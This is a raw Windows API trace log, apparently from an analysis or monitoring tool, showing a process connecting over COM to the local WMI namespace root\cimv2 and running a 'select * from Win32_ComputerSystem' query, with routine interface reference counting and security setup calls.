	[0211.097] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc3dcd0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bad0 | out: ppvObject=0x1c68bad0*=0x1b893250) returned 0x0
	[0211.097] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b893250, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c68bb00 | out: pCid=0x1c68bb00*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0211.097] WbemDefPath:IUnknown:Release (This=0x1b893250) returned 0x3
	[0211.097] CoGetContextToken (in: pToken=0x1c68bae0 | out: pToken=0x1c68bae0) returned 0x0
	[0211.097] WbemDefPath:IUnknown:AddRef (This=0x1cc3dcd0) returned 0x4
	[0211.097] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc3dcd0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bbf8 | out: ppvObject=0x1c68bbf8*=0x0) returned 0x80004002
	[0211.098] WbemDefPath:IUnknown:Release (This=0x1cc3dcd0) returned 0x3
	[0211.098] WbemDefPath:IUnknown:Release (This=0x1cc3dcd0) returned 0x2
	[0211.098] WbemDefPath:IUnknown:Release (This=0x1cc31d00) returned 0x0
	[0211.098] WbemDefPath:IUnknown:Release (This=0x1cc3dcd0) returned 0x1
	[0211.098] CoGetContextToken (in: pToken=0x1c68c810 | out: pToken=0x1c68c810) returned 0x0
	[0211.098] CoGetContextToken (in: pToken=0x1c68c750 | out: pToken=0x1c68c750) returned 0x0
	[0211.098] WbemDefPath:IUnknown:AddRef (This=0x1cc3dcd0) returned 0x2
	[0211.098] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc3dcd0, riid=0x1c68c890*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c68c870 | out: ppvObject=0x1c68c870*=0x1cc3dcd0) returned 0x0
	[0211.099] WbemDefPath:IUnknown:Release (This=0x1cc3dcd0) returned 0x2
	[0211.099] WbemDefPath:IUnknown:Release (This=0x1cc3dcd0) returned 0x1
	[0211.099] CoGetContextToken (in: pToken=0x1c68c990 | out: pToken=0x1c68c990) returned 0x0
	[0211.099] CoGetContextToken (in: pToken=0x1c68c8d0 | out: pToken=0x1c68c8d0) returned 0x0
	[0211.099] WbemDefPath:IUnknown:AddRef (This=0x1cc3dcd0) returned 0x2
	[0211.099] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc3dcd0, riid=0x1c68ca10*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c68c9f0 | out: ppvObject=0x1c68c9f0*=0x1cc3dcd0) returned 0x0
	[0211.100] WbemDefPath:IUnknown:Release (This=0x1cc3dcd0) returned 0x2
	[0211.100] WbemDefPath:IUnknown:AddRef (This=0x1cc3dcd0) returned 0x3
	[0211.100] WbemDefPath:IWbemPath:SetText (This=0x1cc3dcd0, uMode=0x4, pszPath="\\\\localhost\\root\\cimv2") returned 0x0
	[0211.100] WbemDefPath:IUnknown:Release (This=0x1cc3dcd0) returned 0x2
	[0211.101] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc3dcd0, puCount=0x1c68cca0 | out: puCount=0x1c68cca0*=0x2) returned 0x0
	[0211.101] WbemDefPath:IWbemPath:GetText (in: This=0x1cc3dcd0, lFlags=4, puBuffLength=0x1c68cca0*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cca0*=0x17, pszText=0x0) returned 0x0
	[0211.101] WbemDefPath:IWbemPath:GetText (in: This=0x1cc3dcd0, lFlags=4, puBuffLength=0x1c68cca0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cca0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0211.101] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc3dcd0, puCount=0x1c68cc50 | out: puCount=0x1c68cc50*=0x2) returned 0x0
	[0211.101] WbemDefPath:IWbemPath:GetText (in: This=0x1cc3dcd0, lFlags=4, puBuffLength=0x1c68cc50*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cc50*=0x17, pszText=0x0) returned 0x0
	[0211.101] WbemDefPath:IWbemPath:GetText (in: This=0x1cc3dcd0, lFlags=4, puBuffLength=0x1c68cc50*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cc50*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0211.101] CoGetObjectContext (in: riid=0x1c68cb88*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c68cb80 | out: ppv=0x1c68cb80*=0x221868) returned 0x0
	[0211.101] IComThreadingInfo:GetCurrentApartmentType (in: This=0x221868, pAptType=0x1c68cba0 | out: pAptType=0x1c68cba0*=1) returned 0x0
	[0211.101] IUnknown:QueryInterface (in: This=0x221868, riid=0x2efe148*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c68cca8 | out: ppvObject=0x1c68cca8*=0x0) returned 0x80004002
	[0211.102] IUnknown:Release (This=0x221868) returned 0x1
	[0211.102] CoGetClassObject (in: rclsid=0x1b8749f8*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c68c830 | out: ppv=0x1c68c830*=0x1cc31da0) returned 0x0
	[0211.102] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc31da0, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68c540 | out: ppvObject=0x1c68c540*=0x0) returned 0x80004002
	[0211.103] WbemLocator:IClassFactory:CreateInstance (in: This=0x1cc31da0, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c528 | out: ppvObject=0x1c68c528*=0x1cc31dc0) returned 0x0
	[0211.103] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc31dc0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c430 | out: ppvObject=0x1c68c430*=0x1cc31dc0) returned 0x0
	[0211.103] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc31dc0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68c4b0 | out: ppvObject=0x1c68c4b0*=0x0) returned 0x80004002
	[0211.104] WbemLocator:IUnknown:AddRef (This=0x1cc31dc0) returned 0x3
	[0211.104] CoGetContextToken (in: pToken=0x1c68c100 | out: pToken=0x1c68c100) returned 0x0
	[0211.104] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc31dc0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c0c0 | out: ppvObject=0x1c68c0c0*=0x0) returned 0x80004002
	[0211.105] CoGetContextToken (in: pToken=0x1c68c0d0 | out: pToken=0x1c68c0d0) returned 0x0
	[0211.105] WbemLocator:IUnknown:AddRef (This=0x1cc31dc0) returned 0x4
	[0211.105] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc31dc0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c1e8 | out: ppvObject=0x1c68c1e8*=0x0) returned 0x80004002
	[0211.105] WbemLocator:IUnknown:Release (This=0x1cc31dc0) returned 0x3
	[0211.105] WbemLocator:IUnknown:Release (This=0x1cc31dc0) returned 0x2
	[0211.106] WbemLocator:IUnknown:Release (This=0x1cc31da0) returned 0x0
	[0211.106] WbemLocator:IUnknown:Release (This=0x1cc31dc0) returned 0x1
	[0211.106] CoGetContextToken (in: pToken=0x1c68c6f0 | out: pToken=0x1c68c6f0) returned 0x0
	[0211.106] CoGetContextToken (in: pToken=0x1c68c630 | out: pToken=0x1c68c630) returned 0x0
	[0211.106] WbemLocator:IUnknown:AddRef (This=0x1cc31dc0) returned 0x2
	[0211.106] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc31dc0, riid=0x1c68c770*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c68c750 | out: ppvObject=0x1c68c750*=0x1cc31dc0) returned 0x0
	[0211.107] WbemLocator:IUnknown:Release (This=0x1cc31dc0) returned 0x2
	[0211.107] WbemLocator:IUnknown:Release (This=0x1cc31dc0) returned 0x1
	[0211.107] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc3dcd0, puCount=0x1c68cb50 | out: puCount=0x1c68cb50*=0x2) returned 0x0
	[0211.107] WbemDefPath:IWbemPath:GetText (in: This=0x1cc3dcd0, lFlags=8, puBuffLength=0x1c68cb50*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cb50*=0x17, pszText=0x0) returned 0x0
	[0211.107] WbemDefPath:IWbemPath:GetText (in: This=0x1cc3dcd0, lFlags=8, puBuffLength=0x1c68cb50*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cb50*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0211.108] CoCreateInstance (in: rclsid=0x642ffff15a8*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x642ffff14d8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1c68c840 | out: ppv=0x1c68c840*=0x1cc31de0) returned 0x0
	[0211.108] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1cc31de0, strNetworkResource="\\\\localhost\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x1c68cad0 | out: ppNamespace=0x1c68cad0*=0x1cc3aec8) returned 0x0
	[0211.620] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc3aec8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c6b8 | out: ppvObject=0x1c68c6b8*=0x1b86eca0) returned 0x0
	[0211.620] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x1b86eca0, pProxy=0x1cc3aec8, pAuthnSvc=0x1c68c6b0, pAuthzSvc=0x1c68c6ac, pServerPrincName=0x1c68c6d8, pAuthnLevel=0x1c68c6a8, pImpLevel=0x1c68c6c4, pAuthInfo=0x1c68c6e8, pCapabilites=0x1c68c6c0 | out: pAuthnSvc=0x1c68c6b0*=0xa, pAuthzSvc=0x1c68c6ac*=0x0, pServerPrincName=0x1c68c6d8, pAuthnLevel=0x1c68c6a8*=0x6, pImpLevel=0x1c68c6c4*=0x2, pAuthInfo=0x1c68c6e8, pCapabilites=0x1c68c6c0*=0x1) returned 0x0
	[0211.620] WbemLocator:IUnknown:Release (This=0x1b86eca0) returned 0x1
	[0211.620] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc3aec8, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c658 | out: ppvObject=0x1c68c658*=0x1b86ece0) returned 0x0
	[0211.620] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc3aec8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c5e8 | out: ppvObject=0x1c68c5e8*=0x1b86eca0) returned 0x0
	[0211.620] WbemLocator:IClientSecurity:SetBlanket (This=0x1b86eca0, pProxy=0x1cc3aec8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0211.621] WbemLocator:IUnknown:Release (This=0x1b86eca0) returned 0x2
	[0211.621] WbemLocator:IUnknown:Release (This=0x1b86ece0) returned 0x1
	[0211.621] CoTaskMemFree (pv=0x1b885f20) 
	[0211.621] WbemLocator:IUnknown:Release (This=0x1cc31de0) returned 0x0
	[0211.621] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc3aec8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c2d0 | out: ppvObject=0x1c68c2d0*=0x1b86ece0) returned 0x0
	[0211.621] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86ece0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68c350 | out: ppvObject=0x1c68c350*=0x0) returned 0x80004002
	[0211.622] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86ece0, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68c0e8 | out: ppvObject=0x1c68c0e8*=0x0) returned 0x80004002
	[0211.623] WbemLocator:IUnknown:AddRef (This=0x1b86ece0) returned 0x3
	[0211.623] CoGetContextToken (in: pToken=0x1c68bfa0 | out: pToken=0x1c68bfa0) returned 0x0
	[0211.623] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86ece0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bf60 | out: ppvObject=0x1c68bf60*=0x1b86ebc8) returned 0x0
	[0211.623] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b86ebc8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c68bf90 | out: pCid=0x1c68bf90*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0211.623] WbemLocator:IUnknown:Release (This=0x1b86ebc8) returned 0x3
	[0211.624] CoGetContextToken (in: pToken=0x1c68bf70 | out: pToken=0x1c68bf70) returned 0x0
	[0211.624] WbemLocator:IUnknown:AddRef (This=0x1b86ece0) returned 0x4
	[0211.624] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86ece0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c088 | out: ppvObject=0x1c68c088*=0x1b86ecb0) returned 0x0
	[0211.624] WbemLocator:IUnknown:Release (This=0x1b86ece0) returned 0x4
	[0211.624] WbemLocator:IRpcOptions:Query (in: This=0x1b86ecb0, pPrx=0x1b86ece0, dwProperty=2, pdwValue=0x1c68c0f8 | out: pdwValue=0x1c68c0f8) returned 0x80004002
	[0211.624] WbemLocator:IUnknown:Release (This=0x1b86ecb0) returned 0x3
	[0211.624] WbemLocator:IUnknown:Release (This=0x1b86ece0) returned 0x2
	[0211.624] CoGetContextToken (in: pToken=0x1c68c470 | out: pToken=0x1c68c470) returned 0x0
	[0211.624] CoGetContextToken (in: pToken=0x1c68c3b0 | out: pToken=0x1c68c3b0) returned 0x0
	[0211.625] WbemLocator:IUnknown:AddRef (This=0x1b86ece0) returned 0x3
	[0211.625] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86ece0, riid=0x1c68c4f0*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1c68c4d0 | out: ppvObject=0x1c68c4d0*=0x1cc3aec8) returned 0x0
	[0211.625] WbemLocator:IUnknown:Release (This=0x1b86ece0) returned 0x3
	[0211.625] WbemLocator:IUnknown:Release (This=0x1cc3aec8) returned 0x2
	[0211.625] WbemLocator:IUnknown:Release (This=0x1cc3aec8) returned 0x1
	[0211.625] CoGetContextToken (in: pToken=0x1c68ca70 | out: pToken=0x1c68ca70) returned 0x0
	[0211.625] WbemLocator:IUnknown:AddRef (This=0x1b86ece0) returned 0x2
	[0211.626] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86ece0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c640 | out: ppvObject=0x1c68c640*=0x1b86ece0) returned 0x0
	[0211.626] WbemLocator:IUnknown:Release (This=0x1b86ece0) returned 0x2
	[0211.626] WbemLocator:IUnknown:Release (This=0x1b86ece0) returned 0x1
	[0211.626] CoGetContextToken (in: pToken=0x1c68c710 | out: pToken=0x1c68c710) returned 0x0
	[0211.626] CoGetContextToken (in: pToken=0x1c68c650 | out: pToken=0x1c68c650) returned 0x0
	[0211.626] WbemLocator:IUnknown:AddRef (This=0x1b86ece0) returned 0x2
	[0211.626] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86ece0, riid=0x1c68c790*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1c68c770 | out: ppvObject=0x1c68c770*=0x1cc3aec8) returned 0x0
	[0211.627] WbemLocator:IUnknown:Release (This=0x1b86ece0) returned 0x2
	[0211.627] WbemLocator:IUnknown:AddRef (This=0x1cc3aec8) returned 0x3
	[0211.627] IWbemServices:ExecQuery (in: This=0x1cc3aec8, strQueryLanguage="WQL", strQuery="select * from Win32_ComputerSystem", lFlags=16, pCtx=0x0, ppEnum=0x1c68cc08 | out: ppEnum=0x1c68cc08*=0x1cc40798) returned 0x0
	[0211.635] IUnknown:QueryInterface (in: This=0x1cc40798, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c818 | out: ppvObject=0x1c68c818*=0x1cc407a0) returned 0x0
	[0211.635] IClientSecurity:QueryBlanket (in: This=0x1cc407a0, pProxy=0x1cc40798, pAuthnSvc=0x1c68c810, pAuthzSvc=0x1c68c80c, pServerPrincName=0x1c68c838, pAuthnLevel=0x1c68c808, pImpLevel=0x1c68c824, pAuthInfo=0x1c68c848, pCapabilites=0x1c68c820 | out: pAuthnSvc=0x1c68c810*=0xa, pAuthzSvc=0x1c68c80c*=0x0, pServerPrincName=0x1c68c838, pAuthnLevel=0x1c68c808*=0x6, pImpLevel=0x1c68c824*=0x2, pAuthInfo=0x1c68c848, pCapabilites=0x1c68c820*=0x1) returned 0x0
	[0211.635] IUnknown:Release (This=0x1cc407a0) returned 0x1
	[0211.635] IUnknown:QueryInterface (in: This=0x1cc40798, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c7b8 | out: ppvObject=0x1c68c7b8*=0x1b86eb60) returned 0x0
	[0211.635] IUnknown:QueryInterface (in: This=0x1cc40798, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c748 | out: ppvObject=0x1c68c748*=0x1cc407a0) returned 0x0
	[0211.635] IClientSecurity:SetBlanket (This=0x1cc407a0, pProxy=0x1cc40798, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0211.637] IUnknown:Release (This=0x1cc407a0) returned 0x2
	[0211.637] WbemLocator:IUnknown:Release (This=0x1b86eb60) returned 0x1
	[0211.637] CoTaskMemFree (pv=0x1b885f80) 
	[0211.638] IUnknown:QueryInterface (in: This=0x1cc40798, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c3f0 | out: ppvObject=0x1c68c3f0*=0x1b86eb60) returned 0x0
	[0211.638] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86eb60, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68c470 | out: ppvObject=0x1c68c470*=0x0) returned 0x80004002
	[0211.638] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86eb60, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68c208 | out: ppvObject=0x1c68c208*=0x0) returned 0x80004002
	[0211.639] WbemLocator:IUnknown:AddRef (This=0x1b86eb60) returned 0x3
	[0211.639] CoGetContextToken (in: pToken=0x1c68c0c0 | out: pToken=0x1c68c0c0) returned 0x0
	[0211.639] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86eb60, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c080 | out: ppvObject=0x1c68c080*=0x1b86ea48) returned 0x0
	[0211.640] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b86ea48, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c68c0b0 | out: pCid=0x1c68c0b0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0211.640] WbemLocator:IUnknown:Release (This=0x1b86ea48) returned 0x3
	[0211.640] CoGetContextToken (in: pToken=0x1c68c090 | out: pToken=0x1c68c090) returned 0x0
	[0211.640] WbemLocator:IUnknown:AddRef (This=0x1b86eb60) returned 0x4
	[0211.640] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86eb60, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c1a8 | out: ppvObject=0x1c68c1a8*=0x1b86eb30) returned 0x0
	[0211.640] WbemLocator:IUnknown:Release (This=0x1b86eb60) returned 0x4
	[0211.640] WbemLocator:IRpcOptions:Query (in: This=0x1b86eb30, pPrx=0x1b86eb60, dwProperty=2, pdwValue=0x1c68c218 | out: pdwValue=0x1c68c218) returned 0x80004002
	[0211.640] WbemLocator:IUnknown:Release (This=0x1b86eb30) returned 0x3
	[0211.641] WbemLocator:IUnknown:Release (This=0x1b86eb60) returned 0x2
	[0211.641] CoGetContextToken (in: pToken=0x1c68c590 | out: pToken=0x1c68c590) returned 0x0
	[0211.641] CoGetContextToken (in: pToken=0x1c68c4d0 | out: pToken=0x1c68c4d0) returned 0x0
	[0211.641] WbemLocator:IUnknown:AddRef (This=0x1b86eb60) returned 0x3
	[0211.641] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86eb60, riid=0x1c68c610*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c68c5f0 | out: ppvObject=0x1c68c5f0*=0x1cc40798) returned 0x0
	[0211.641] WbemLocator:IUnknown:Release (This=0x1b86eb60) returned 0x3
	[0211.641] IUnknown:Release (This=0x1cc40798) returned 0x2
	[0211.641] IUnknown:Release (This=0x1cc40798) returned 0x1
	[0211.642] WbemLocator:IUnknown:Release (This=0x1cc3aec8) returned 0x2
	[0211.642] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc3dcd0, puCount=0x1c68cbb0 | out: puCount=0x1c68cbb0*=0x2) returned 0x0
	[0211.642] WbemDefPath:IWbemPath:GetText (in: This=0x1cc3dcd0, lFlags=4, puBuffLength=0x1c68cbb0*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cbb0*=0x17, pszText=0x0) returned 0x0
	[0211.642] WbemDefPath:IWbemPath:GetText (in: This=0x1cc3dcd0, lFlags=4, puBuffLength=0x1c68cbb0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cbb0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0211.642] CoGetContextToken (in: pToken=0x1c68c7b0 | out: pToken=0x1c68c7b0) returned 0x0
	[0211.642] CoGetContextToken (in: pToken=0x1c68c6f0 | out: pToken=0x1c68c6f0) returned 0x0
	[0211.642] WbemLocator:IUnknown:AddRef (This=0x1b86eb60) returned 0x2
